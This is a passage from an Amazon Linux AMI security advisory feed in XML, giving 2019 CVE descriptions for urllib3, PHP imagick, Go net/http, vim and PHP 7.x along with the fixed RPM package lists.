</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11236" title="" id="CVE-2019-11236" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="python27-urllib3" version="1.24.3" release="1.8.amzn1" epoch="0" arch="noarch"><filename>Packages/python27-urllib3-1.24.3-1.8.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1237</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1237: medium priority package update for php54-pecl-imagick php55-pecl-imagick php56-pecl-imagick php70-pecl-imagick php71-pecl-imagick php72-pecl-imagick</title><issued date="2019-07-17 23:26:00" /><updated date="2019-07-25 18:37:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-11037:
In PHP imagick extension in versions between 3.3.0 and 3.4.4, writing to an array of values in ImagickKernel::fromMatrix() function did not check that the address would be within the allocated array. This could lead to an out-of-bounds write to memory if the function is called with data controlled by an untrusted party.
1708570:
CVE-2019-11037 php-imagick: out-of-bounds write to memory in ImagickKernel::fromMatrix() leading to possible crash and DoS
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11037" title="" id="CVE-2019-11037" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php54-pecl-imagick" version="3.4.4" release="1.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-pecl-imagick-3.4.4-1.10.amzn1.x86_64.rpm</filename></package><package name="php54-pecl-imagick-debuginfo" version="3.4.4" release="1.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-pecl-imagick-debuginfo-3.4.4-1.10.amzn1.x86_64.rpm</filename></package><package name="php54-pecl-imagick-debuginfo" version="3.4.4" release="1.10.amzn1" epoch="0" arch="i686"><filename>Packages/php54-pecl-imagick-debuginfo-3.4.4-1.10.amzn1.i686.rpm</filename></package><package name="php54-pecl-imagick" version="3.4.4" release="1.10.amzn1" epoch="0" arch="i686"><filename>Packages/php54-pecl-imagick-3.4.4-1.10.amzn1.i686.rpm</filename></package><package name="php56-pecl-imagick" version="3.4.4" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-pecl-imagick-3.4.4-1.15.amzn1.x86_64.rpm</filename></package><package name="php56-pecl-imagick-debuginfo" version="3.4.4" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/php56-pecl-imagick-debuginfo-3.4.4-1.15.amzn1.x86_64.rpm</filename></package><package name="php56-pecl-imagick" version="3.4.4" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/php56-pecl-imagick-3.4.4-1.15.amzn1.i686.rpm</filename></package><package name="php56-pecl-imagick-debuginfo" version="3.4.4" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/php56-pecl-imagick-debuginfo-3.4.4-1.15.amzn1.i686.rpm</filename></package><package name="php55-pecl-imagick" version="3.4.4" release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-pecl-imagick-3.4.4-1.14.amzn1.x86_64.rpm</filename></package><package name="php55-pecl-imagick-debuginfo" version="3.4.4" 
release="1.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-pecl-imagick-debuginfo-3.4.4-1.14.amzn1.x86_64.rpm</filename></package><package name="php55-pecl-imagick" version="3.4.4" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/php55-pecl-imagick-3.4.4-1.14.amzn1.i686.rpm</filename></package><package name="php55-pecl-imagick-debuginfo" version="3.4.4" release="1.14.amzn1" epoch="0" arch="i686"><filename>Packages/php55-pecl-imagick-debuginfo-3.4.4-1.14.amzn1.i686.rpm</filename></package><package name="php71-pecl-imagick-devel" version="3.4.4" release="1.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-pecl-imagick-devel-3.4.4-1.7.amzn1.x86_64.rpm</filename></package><package name="php71-pecl-imagick" version="3.4.4" release="1.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-pecl-imagick-3.4.4-1.7.amzn1.x86_64.rpm</filename></package><package name="php71-pecl-imagick-debuginfo" version="3.4.4" release="1.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-pecl-imagick-debuginfo-3.4.4-1.7.amzn1.x86_64.rpm</filename></package><package name="php71-pecl-imagick-debuginfo" version="3.4.4" release="1.7.amzn1" epoch="0" arch="i686"><filename>Packages/php71-pecl-imagick-debuginfo-3.4.4-1.7.amzn1.i686.rpm</filename></package><package name="php71-pecl-imagick" version="3.4.4" release="1.7.amzn1" epoch="0" arch="i686"><filename>Packages/php71-pecl-imagick-3.4.4-1.7.amzn1.i686.rpm</filename></package><package name="php71-pecl-imagick-devel" version="3.4.4" release="1.7.amzn1" epoch="0" arch="i686"><filename>Packages/php71-pecl-imagick-devel-3.4.4-1.7.amzn1.i686.rpm</filename></package><package name="php70-pecl-imagick-debuginfo" version="3.4.4" release="1.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-pecl-imagick-debuginfo-3.4.4-1.6.amzn1.x86_64.rpm</filename></package><package name="php70-pecl-imagick-devel" version="3.4.4" release="1.6.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/php70-pecl-imagick-devel-3.4.4-1.6.amzn1.x86_64.rpm</filename></package><package name="php70-pecl-imagick" version="3.4.4" release="1.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/php70-pecl-imagick-3.4.4-1.6.amzn1.x86_64.rpm</filename></package><package name="php70-pecl-imagick-debuginfo" version="3.4.4" release="1.6.amzn1" epoch="0" arch="i686"><filename>Packages/php70-pecl-imagick-debuginfo-3.4.4-1.6.amzn1.i686.rpm</filename></package><package name="php70-pecl-imagick" version="3.4.4" release="1.6.amzn1" epoch="0" arch="i686"><filename>Packages/php70-pecl-imagick-3.4.4-1.6.amzn1.i686.rpm</filename></package><package name="php70-pecl-imagick-devel" version="3.4.4" release="1.6.amzn1" epoch="0" arch="i686"><filename>Packages/php70-pecl-imagick-devel-3.4.4-1.6.amzn1.i686.rpm</filename></package><package name="php72-pecl-imagick-devel" version="3.4.4" release="1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-pecl-imagick-devel-3.4.4-1.9.amzn1.x86_64.rpm</filename></package><package name="php72-pecl-imagick-debuginfo" version="3.4.4" release="1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-pecl-imagick-debuginfo-3.4.4-1.9.amzn1.x86_64.rpm</filename></package><package name="php72-pecl-imagick" version="3.4.4" release="1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/php72-pecl-imagick-3.4.4-1.9.amzn1.x86_64.rpm</filename></package><package name="php72-pecl-imagick" version="3.4.4" release="1.9.amzn1" epoch="0" arch="i686"><filename>Packages/php72-pecl-imagick-3.4.4-1.9.amzn1.i686.rpm</filename></package><package name="php72-pecl-imagick-debuginfo" version="3.4.4" release="1.9.amzn1" epoch="0" arch="i686"><filename>Packages/php72-pecl-imagick-debuginfo-3.4.4-1.9.amzn1.i686.rpm</filename></package><package name="php72-pecl-imagick-devel" version="3.4.4" release="1.9.amzn1" epoch="0" 
arch="i686"><filename>Packages/php72-pecl-imagick-devel-3.4.4-1.9.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1238</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1238: medium priority package update for golang</title><issued date="2019-07-17 23:28:00" /><updated date="2019-07-25 18:38:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-9741:
An issue was discovered in net/http in Go 1.11.5. CRLF injection is possible if the attacker controls a url parameter, as demonstrated by the second argument to http.NewRequest with \r\n followed by an HTTP header or a Redis command.
1688230:
CVE-2019-9741 golang: CRLF injection in net/http
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9741" title="" id="CVE-2019-9741" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="golang-bin" version="1.12.5" release="1.50.amzn1" epoch="0" arch="x86_64"><filename>Packages/golang-bin-1.12.5-1.50.amzn1.x86_64.rpm</filename></package><package name="golang-docs" version="1.12.5" release="1.50.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-docs-1.12.5-1.50.amzn1.noarch.rpm</filename></package><package name="golang" version="1.12.5" release="1.50.amzn1" epoch="0" arch="x86_64"><filename>Packages/golang-1.12.5-1.50.amzn1.x86_64.rpm</filename></package><package name="golang-src" version="1.12.5" release="1.50.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-src-1.12.5-1.50.amzn1.noarch.rpm</filename></package><package name="golang-tests" version="1.12.5" release="1.50.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-tests-1.12.5-1.50.amzn1.noarch.rpm</filename></package><package name="golang-race" version="1.12.5" release="1.50.amzn1" epoch="0" arch="x86_64"><filename>Packages/golang-race-1.12.5-1.50.amzn1.x86_64.rpm</filename></package><package name="golang-misc" version="1.12.5" release="1.50.amzn1" epoch="0" arch="noarch"><filename>Packages/golang-misc-1.12.5-1.50.amzn1.noarch.rpm</filename></package><package name="golang-bin" version="1.12.5" release="1.50.amzn1" epoch="0" arch="i686"><filename>Packages/golang-bin-1.12.5-1.50.amzn1.i686.rpm</filename></package><package name="golang" version="1.12.5" release="1.50.amzn1" epoch="0" arch="i686"><filename>Packages/golang-1.12.5-1.50.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1239</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1239: important priority package update for 
vim</title><issued date="2019-07-17 23:30:00" /><updated date="2019-08-26 22:17:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-12735:
It was found that the `:source!` command was not restricted by the sandbox mode. If modeline was explicitly enabled, opening a specially crafted text file in vim could result in arbitrary command execution.
1718308:
CVE-2019-12735 vim/neovim: ':source!' command allows arbitrary command execution via modelines
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12735" title="" id="CVE-2019-12735" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="vim-debuginfo" version="8.0.0503" release="1.46.amzn1" epoch="2" arch="x86_64"><filename>Packages/vim-debuginfo-8.0.0503-1.46.amzn1.x86_64.rpm</filename></package><package name="vim-minimal" version="8.0.0503" release="1.46.amzn1" epoch="2" arch="x86_64"><filename>Packages/vim-minimal-8.0.0503-1.46.amzn1.x86_64.rpm</filename></package><package name="vim-common" version="8.0.0503" release="1.46.amzn1" epoch="2" arch="x86_64"><filename>Packages/vim-common-8.0.0503-1.46.amzn1.x86_64.rpm</filename></package><package name="vim-filesystem" version="8.0.0503" release="1.46.amzn1" epoch="2" arch="x86_64"><filename>Packages/vim-filesystem-8.0.0503-1.46.amzn1.x86_64.rpm</filename></package><package name="vim-enhanced" version="8.0.0503" release="1.46.amzn1" epoch="2" arch="x86_64"><filename>Packages/vim-enhanced-8.0.0503-1.46.amzn1.x86_64.rpm</filename></package><package name="vim-filesystem" version="8.0.0503" release="1.46.amzn1" epoch="2" arch="i686"><filename>Packages/vim-filesystem-8.0.0503-1.46.amzn1.i686.rpm</filename></package><package name="vim-enhanced" version="8.0.0503" release="1.46.amzn1" epoch="2" arch="i686"><filename>Packages/vim-enhanced-8.0.0503-1.46.amzn1.i686.rpm</filename></package><package name="vim-common" version="8.0.0503" release="1.46.amzn1" epoch="2" arch="i686"><filename>Packages/vim-common-8.0.0503-1.46.amzn1.i686.rpm</filename></package><package name="vim-minimal" version="8.0.0503" release="1.46.amzn1" epoch="2" arch="i686"><filename>Packages/vim-minimal-8.0.0503-1.46.amzn1.i686.rpm</filename></package><package name="vim-debuginfo" version="8.0.0503" release="1.46.amzn1" epoch="2" 
arch="i686"><filename>Packages/vim-debuginfo-8.0.0503-1.46.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1240</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1240: medium priority package update for php71 php72 php73</title><issued date="2019-07-17 23:33:00" /><updated date="2019-07-25 18:41:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-11040:
When the PHP EXIF extension is parsing EXIF information from an image, e.g. via the exif_read_data() function, in PHP versions 7.1.x below 7.1.30, 7.2.x below 7.2.19 and 7.3.x below 7.3.6 it is possible to supply it with data that will cause it to read past the allocated buffer. This may lead to information disclosure or crash.
1724154:
CVE-2019-11040 php: information disclosure in function exif_read_data() leads to denial of service
CVE-2019-11039:
Function iconv_mime_decode_headers() in PHP versions 7.1.x below 7.1.30, 7.2.x below 7.2.19 and 7.3.x below 7.3.6 may perform an out-of-buffer read due to integer overflow when parsing MIME headers. This may lead to information disclosure or crash.
1724152:
CVE-2019-11039 php: out-of-bounds read due to integer overflow in function iconv_mime_decode_headers()
CVE-2019-11038:
When using the gdImageCreateFromXbm() function of the PHP gd extension in PHP versions 7.1.x below 7.1.30, 7.2.x below 7.2.19 and 7.3.x below 7.3.6, it is possible to supply data that will cause the function to use the value of an uninitialized variable. This may lead to disclosing contents of the stack that have been left there by previous code.
1724149:
CVE-2019-11038 gd: information disclosure in function gdImageCreateFromXbm()
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11038" title="" id="CVE-2019-11038" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11039" title="" id="CVE-2019-11039" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11040" title="" id="CVE-2019-11040" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php73-dbg" version="7.3.6" release="1.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-dbg-7.3.6-1.17.amzn1.x86_64.rpm</filename></package><package name="php73-recode" version="7.3.6" release="1.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-recode-7.3.6-1.17.amzn1.x86_64.rpm</filename></package><package name="php73-mysqlnd" version="7.3.6" release="1.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-mysqlnd-7.3.6-1.17.amzn1.x86_64.rpm</filename></package><package name="php73-devel" version="7.3.6" release="1.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-devel-7.3.6-1.17.amzn1.x86_64.rpm</filename></package><package name="php73-xmlrpc" version="7.3.6" release="1.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-xmlrpc-7.3.6-1.17.amzn1.x86_64.rpm</filename></package><package name="php73-pgsql" version="7.3.6" release="1.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-pgsql-7.3.6-1.17.amzn1.x86_64.rpm</filename></package><package name="php73-xml" version="7.3.6" release="1.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-xml-7.3.6-1.17.amzn1.x86_64.rpm</filename></package><package name="php73-opcache" version="7.3.6" release="1.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-opcache-7.3.6-1.17.amzn1.x86_64.rpm</filename></package><package name="php73-dba" version="7.3.6" release="1.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-dba-7.3.6-1.17.amzn1.x86_64.rpm</filename></package><package 
name="php73-gmp" version="7.3.6" release="1.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-gmp-7.3.6-1.17.amzn1.x86_64.rpm</filename></package><package name="php73-cli" version="7.3.6" release="1.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-cli-7.3.6-1.17.amzn1.x86_64.rpm</filename></package><package name="php73-json" version="7.3.6" release="1.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-json-7.3.6-1.17.amzn1.x86_64.rpm</filename></package><package name="php73-pdo-dblib" version="7.3.6" release="1.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-pdo-dblib-7.3.6-1.17.amzn1.x86_64.rpm</filename></package><package name="php73-mbstring" version="7.3.6" release="1.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-mbstring-7.3.6-1.17.amzn1.x86_64.rpm</filename></package><package name="php73-fpm" version="7.3.6" release="1.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-fpm-7.3.6-1.17.amzn1.x86_64.rpm</filename></package><package name="php73-common" version="7.3.6" release="1.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-common-7.3.6-1.17.amzn1.x86_64.rpm</filename></package><package name="php73-intl" version="7.3.6" release="1.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-intl-7.3.6-1.17.amzn1.x86_64.rpm</filename></package><package name="php73-imap" version="7.3.6" release="1.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-imap-7.3.6-1.17.amzn1.x86_64.rpm</filename></package><package name="php73-soap" version="7.3.6" release="1.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-soap-7.3.6-1.17.amzn1.x86_64.rpm</filename></package><package name="php73-debuginfo" version="7.3.6" release="1.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-debuginfo-7.3.6-1.17.amzn1.x86_64.rpm</filename></package><package name="php73-odbc" version="7.3.6" release="1.17.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/php73-odbc-7.3.6-1.17.amzn1.x86_64.rpm</filename></package><package name="php73-embedded" version="7.3.6" release="1.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-embedded-7.3.6-1.17.amzn1.x86_64.rpm</filename></package><package name="php73-ldap" version="7.3.6" release="1.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-ldap-7.3.6-1.17.amzn1.x86_64.rpm</filename></package><package name="php73-bcmath" version="7.3.6" release="1.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-bcmath-7.3.6-1.17.amzn1.x86_64.rpm</filename></package><package name="php73-snmp" version="7.3.6" release="1.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-snmp-7.3.6-1.17.amzn1.x86_64.rpm</filename></package><package name="php73-tidy" version="7.3.6" release="1.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-tidy-7.3.6-1.17.amzn1.x86_64.rpm</filename></package><package name="php73-gd" version="7.3.6" release="1.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-gd-7.3.6-1.17.amzn1.x86_64.rpm</filename></package><package name="php73-pspell" version="7.3.6" release="1.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-pspell-7.3.6-1.17.amzn1.x86_64.rpm</filename></package><package name="php73-pdo" version="7.3.6" release="1.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-pdo-7.3.6-1.17.amzn1.x86_64.rpm</filename></package><package name="php73-process" version="7.3.6" release="1.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-process-7.3.6-1.17.amzn1.x86_64.rpm</filename></package><package name="php73-enchant" version="7.3.6" release="1.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-enchant-7.3.6-1.17.amzn1.x86_64.rpm</filename></package><package name="php73" version="7.3.6" release="1.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-7.3.6-1.17.amzn1.x86_64.rpm</filename></package><package name="php73-fpm" version="7.3.6" release="1.17.amzn1" 
epoch="0" arch="i686"><filename>Packages/php73-fpm-7.3.6-1.17.amzn1.i686.rpm</filename></package><package name="php73-gd" version="7.3.6" release="1.17.amzn1" epoch="0" arch="i686"><filename>Packages/php73-gd-7.3.6-1.17.amzn1.i686.rpm</filename></package><package name="php73-bcmath" version="7.3.6" release="1.17.amzn1" epoch="0" arch="i686"><filename>Packages/php73-bcmath-7.3.6-1.17.amzn1.i686.rpm</filename></package><package name="php73-mysqlnd" version="7.3.6" release="1.17.amzn1" epoch="0" arch="i686"><filename>Packages/php73-mysqlnd-7.3.6-1.17.amzn1.i686.rpm</filename></package><package name="php73-common" version="7.3.6" release="1.17.amzn1" epoch="0" arch="i686"><filename>Packages/php73-common-7.3.6-1.17.amzn1.i686.rpm</filename></package><package name="php73-cli" version="7.3.6" release="1.17.amzn1" epoch="0" arch="i686"><filename>Packages/php73-cli-7.3.6-1.17.amzn1.i686.rpm</filename></package><package name="php73-tidy" version="7.3.6" release="1.17.amzn1" epoch="0" arch="i686"><filename>Packages/php73-tidy-7.3.6-1.17.amzn1.i686.rpm</filename></package><package name="php73-odbc" version="7.3.6" release="1.17.amzn1" epoch="0" arch="i686"><filename>Packages/php73-odbc-7.3.6-1.17.amzn1.i686.rpm</filename></package><package name="php73-json" version="7.3.6" release="1.17.amzn1" epoch="0" arch="i686"><filename>Packages/php73-json-7.3.6-1.17.amzn1.i686.rpm</filename></package><package name="php73-xmlrpc" version="7.3.6" release="1.17.amzn1" epoch="0" arch="i686"><filename>Packages/php73-xmlrpc-7.3.6-1.17.amzn1.i686.rpm</filename></package><package name="php73-pgsql" version="7.3.6" release="1.17.amzn1" epoch="0" arch="i686"><filename>Packages/php73-pgsql-7.3.6-1.17.amzn1.i686.rpm</filename></package><package name="php73-intl" version="7.3.6" release="1.17.amzn1" epoch="0" arch="i686"><filename>Packages/php73-intl-7.3.6-1.17.amzn1.i686.rpm</filename></package><package name="php73-mbstring" version="7.3.6" release="1.17.amzn1" epoch="0" 
arch="i686"><filename>Packages/php73-mbstring-7.3.6-1.17.amzn1.i686.rpm</filename></package><package name="php73-pdo" version="7.3.6" release="1.17.amzn1" epoch="0" arch="i686"><filename>Packages/php73-pdo-7.3.6-1.17.amzn1.i686.rpm</filename></package><package name="php73-imap" version="7.3.6" release="1.17.amzn1" epoch="0" arch="i686"><filename>Packages/php73-imap-7.3.6-1.17.amzn1.i686.rpm</filename></package><package name="php73-debuginfo" version="7.3.6" release="1.17.amzn1" epoch="0" arch="i686"><filename>Packages/php73-debuginfo-7.3.6-1.17.amzn1.i686.rpm</filename></package><package name="php73-gmp" version="7.3.6" release="1.17.amzn1" epoch="0" arch="i686"><filename>Packages/php73-gmp-7.3.6-1.17.amzn1.i686.rpm</filename></package><package name="php73-dbg" version="7.3.6" release="1.17.amzn1" epoch="0" arch="i686"><filename>Packages/php73-dbg-7.3.6-1.17.amzn1.i686.rpm</filename></package><package name="php73-embedded" version="7.3.6" release="1.17.amzn1" epoch="0" arch="i686"><filename>Packages/php73-embedded-7.3.6-1.17.amzn1.i686.rpm</filename></package><package name="php73-opcache" version="7.3.6" release="1.17.amzn1" epoch="0" arch="i686"><filename>Packages/php73-opcache-7.3.6-1.17.amzn1.i686.rpm</filename></package><package name="php73-dba" version="7.3.6" release="1.17.amzn1" epoch="0" arch="i686"><filename>Packages/php73-dba-7.3.6-1.17.amzn1.i686.rpm</filename></package><package name="php73-xml" version="7.3.6" release="1.17.amzn1" epoch="0" arch="i686"><filename>Packages/php73-xml-7.3.6-1.17.amzn1.i686.rpm</filename></package><package name="php73-process" version="7.3.6" release="1.17.amzn1" epoch="0" arch="i686"><filename>Packages/php73-process-7.3.6-1.17.amzn1.i686.rpm</filename></package><package name="php73-devel" version="7.3.6" release="1.17.amzn1" epoch="0" arch="i686"><filename>Packages/php73-devel-7.3.6-1.17.amzn1.i686.rpm</filename></package><package name="php73" version="7.3.6" release="1.17.amzn1" epoch="0" 
arch="i686"><filename>Packages/php73-7.3.6-1.17.amzn1.i686.rpm</filename></package><package name="php73-enchant" version="7.3.6" release="1.17.amzn1" epoch="0" arch="i686"><filename>Packages/php73-enchant-7.3.6-1.17.amzn1.i686.rpm</filename></package><package name="php73-soap" version="7.3.6" release="1.17.amzn1" epoch="0" arch="i686"><filename>Packages/php73-soap-7.3.6-1.17.amzn1.i686.rpm</filename></package><package name="php73-pspell" version="7.3.6" release="1.17.amzn1" epoch="0" arch="i686"><filename>Packages/php73-pspell-7.3.6-1.17.amzn1.i686.rpm</filename></package><package name="php73-ldap" version="7.3.6" release="1.17.amzn1" epoch="0" arch="i686"><filename>Packages/php73-ldap-7.3.6-1.17.amzn1.i686.rpm</filename></package><package name="php73-pdo-dblib" version="7.3.6" release="1.17.amzn1" epoch="0" arch="i686"><filename>Packages/php73-pdo-dblib-7.3.6-1.17.amzn1.i686.rpm</filename></package><package name="php73-recode" version="7.3.6" release="1.17.amzn1" epoch="0" arch="i686"><filename>Packages/php73-recode-7.3.6-1.17.amzn1.i686.rpm</filename></package><package name="php73-snmp" version="7.3.6" release="1.17.amzn1" epoch="0" arch="i686"><filename>Packages/php73-snmp-7.3.6-1.17.amzn1.i686.rpm</filename></package><package name="php71-dba" version="7.1.30" release="1.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-dba-7.1.30-1.40.amzn1.x86_64.rpm</filename></package><package name="php71-xml" version="7.1.30" release="1.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-xml-7.1.30-1.40.amzn1.x86_64.rpm</filename></package><package name="php71-imap" version="7.1.30" release="1.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-imap-7.1.30-1.40.amzn1.x86_64.rpm</filename></package><package name="php71-ldap" version="7.1.30" release="1.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-ldap-7.1.30-1.40.amzn1.x86_64.rpm</filename></package><package name="php71-bcmath" version="7.1.30" release="1.40.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/php71-bcmath-7.1.30-1.40.amzn1.x86_64.rpm</filename></package><package name="php71-mbstring" version="7.1.30" release="1.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-mbstring-7.1.30-1.40.amzn1.x86_64.rpm</filename></package><package name="php71-gd" version="7.1.30" release="1.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-gd-7.1.30-1.40.amzn1.x86_64.rpm</filename></package><package name="php71-fpm" version="7.1.30" release="1.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-fpm-7.1.30-1.40.amzn1.x86_64.rpm</filename></package><package name="php71-pdo" version="7.1.30" release="1.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-pdo-7.1.30-1.40.amzn1.x86_64.rpm</filename></package><package name="php71-soap" version="7.1.30" release="1.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-soap-7.1.30-1.40.amzn1.x86_64.rpm</filename></package><package name="php71-process" version="7.1.30" release="1.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-process-7.1.30-1.40.amzn1.x86_64.rpm</filename></package><package name="php71-xmlrpc" version="7.1.30" release="1.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-xmlrpc-7.1.30-1.40.amzn1.x86_64.rpm</filename></package><package name="php71-devel" version="7.1.30" release="1.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-devel-7.1.30-1.40.amzn1.x86_64.rpm</filename></package><package name="php71-pspell" version="7.1.30" release="1.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-pspell-7.1.30-1.40.amzn1.x86_64.rpm</filename></package><package name="php71-mcrypt" version="7.1.30" release="1.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-mcrypt-7.1.30-1.40.amzn1.x86_64.rpm</filename></package><package name="php71-opcache" version="7.1.30" release="1.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-opcache-7.1.30-1.40.amzn1.x86_64.rpm</filename></package><package name="php71-gmp" 
version="7.1.30" release="1.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-gmp-7.1.30-1.40.amzn1.x86_64.rpm</filename></package><package name="php71-recode" version="7.1.30" release="1.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-recode-7.1.30-1.40.amzn1.x86_64.rpm</filename></package><package name="php71-pdo-dblib" version="7.1.30" release="1.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-pdo-dblib-7.1.30-1.40.amzn1.x86_64.rpm</filename></package><package name="php71-embedded" version="7.1.30" release="1.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-embedded-7.1.30-1.40.amzn1.x86_64.rpm</filename></package><package name="php71" version="7.1.30" release="1.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-7.1.30-1.40.amzn1.x86_64.rpm</filename></package><package name="php71-snmp" version="7.1.30" release="1.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-snmp-7.1.30-1.40.amzn1.x86_64.rpm</filename></package><package name="php71-intl" version="7.1.30" release="1.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-intl-7.1.30-1.40.amzn1.x86_64.rpm</filename></package><package name="php71-json" version="7.1.30" release="1.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-json-7.1.30-1.40.amzn1.x86_64.rpm</filename></package><package name="php71-mysqlnd" version="7.1.30" release="1.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-mysqlnd-7.1.30-1.40.amzn1.x86_64.rpm</filename></package><package name="php71-cli" version="7.1.30" release="1.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-cli-7.1.30-1.40.amzn1.x86_64.rpm</filename></package><package name="php71-debuginfo" version="7.1.30" release="1.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/php71-debuginfo-7.1.30-1.40.amzn1.x86_64.rpm</filename></package><package name="php71-pgsql" version="7.1.30" release="1.40.amzn1" epoch="0" 
